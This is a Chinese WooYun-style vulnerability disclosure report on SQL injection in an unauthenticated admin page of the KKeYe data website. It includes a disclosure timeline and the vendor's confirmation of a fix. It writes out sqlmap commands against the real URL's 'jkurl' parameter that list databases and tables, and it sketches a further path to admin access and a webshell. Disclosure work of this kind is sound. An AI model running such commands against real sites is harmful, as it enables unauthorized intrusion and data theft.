漏洞概要
关注数(24)
关注此漏洞
漏洞标题:KKeYe开眼数据官网SQL注入漏洞
提交时间:2014-05-26 13:57
修复时间:2014-07-10 13:58
公开时间:2014-07-10 13:58
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-05-26: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-06-06: 细节向核心白帽子及相关领域专家公开
2014-06-16: 细节向普通白帽子公开
2014-06-26: 细节向实习白帽子公开
2014-07-10: 细节向公众公开
简要描述:
乌云帐号得到后,十分珍惜,但也不甘于一直看别人提漏洞。但菜鸟总要经历这个痛苦的过程,每天登录乌云看看别人发现的漏洞,学习下思路,学习下方法,学习下工具。
今天,终于有一个机会展示下学到的一些知识,虽说很简单,但进步总要一步步来。审核不通过没关系,厂商忽略也没关系,不要封我的帐号就好,呵呵~
详细说明:
无意中发现的,官网后台管理地址,有一个页面不需要登录就可以访问
看到参数后的习惯,用sqlmap扫一下吧,果然有惊喜:
测试地址:http://www.kkeye.com/bbacad/downerro.aspx?p=2&jkname=&jkurl=
测试命令:python sqlmap.py -u "http://www.kkeye.com/bbacad/downerro.aspx?jkname=&jkurl=" -p "jkurl" --dbs
测试结果:
除了oracle自带的几个外,还是几个,WEBASP应该是WEB的后台数据库吧,看一下表名
测试命令:python sqlmap.py -u "http://www.kkeye.com/bbacad/downerro.aspx?jkname=&jkurl=" -p "jkurl" --tables -D "WEBASP"
测试结果:
第一次成功使用sqlmap查看到表名,恭喜自己~
参考其它白帽子的习惯,到此为止,不脱裤,不该看的不看。
貌似后续可以破解或增加一个管理员帐号,然后就可以登录WEB操作了;
再然后传大马,上菜刀getshell,不过这些还没有学会,慢慢来。
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-05-27 09:21
厂商回复:
感谢nzk1912同学提出的漏洞,目前已经修复,谢谢
最新状态:
暂无
漏洞评价:
评论